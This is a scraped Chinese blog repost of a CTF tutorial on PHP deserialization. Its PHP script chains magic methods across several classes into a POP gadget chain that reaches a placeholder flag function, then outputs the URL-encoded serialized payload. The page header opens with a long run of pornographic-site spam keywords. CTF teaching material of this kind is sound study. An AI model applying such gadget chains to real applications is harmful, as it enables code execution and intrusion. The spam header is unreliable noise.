日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程语言 > php >内容正文

php

php strlen ctf,CTF中的PHP反序列化漏洞简单分析

發布時間:2024/9/27 php 25 豆豆
生活随笔 收集整理的這篇文章主要介紹了 php strlen ctf,CTF中的PHP反序列化漏洞简单分析 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

[PHP] 純文本查看 復制代碼<?php

class start_gg

{

public $mod1;

public $mod2;

public function __construct()? ?? ?? ?? ?? ? #把$mod1賦值為Call類對象

{

$this->mod1 = new Call();

}

public function __destruct()

{

$this->mod1->test1();

}

}

class Call

{

public $mod1;

public $mod2;

public function __construct()? ?? ?? ?? ?? ? #把 $mod1賦值為funct類對象

{

$this->mod1 = new funct();

}

public function test1()

{

$this->mod1->test2();

}

}

class funct

{

public $mod1;

public $mod2;

public function __construct()? ?? ?? ?? ?? ? #把 $mod1賦值為func類對象

{

$this->mod1= new func();

}

public function __call($test2,$arr)

{

$s1 = $this->mod1;

$s1();

}

}

class func

{

public $mod1;

public $mod2;

public function __construct()? ?? ?? ?? ?? ? #把 $mod1賦值為string1類對象

{

$this->mod1= new string1();

}

public function __invoke()

{

$this->mod2 = "字符串拼接".$this->mod1;

}

}

class string1

{

public $str1;

public function __construct()? ?? ?? ?? ?? ? #把 $str1賦值為GetFlag類對象

{

$this->str1= new GetFlag();

}

public function __toString()

{

$this->str1->get_flag();

return "1";

}

}

class GetFlag

{

public function get_flag()

{

echo "flag:"."xxxxxxxxxxxx";

}

}

$b = new start_gg;? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #構造start_gg類對象$b

echo urlencode(serialize($b))."
";? ?? ???#顯示輸出url編碼后的序列化對象

總結

以上是生活随笔為你收集整理的php strlen ctf,CTF中的PHP反序列化漏洞简单分析的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。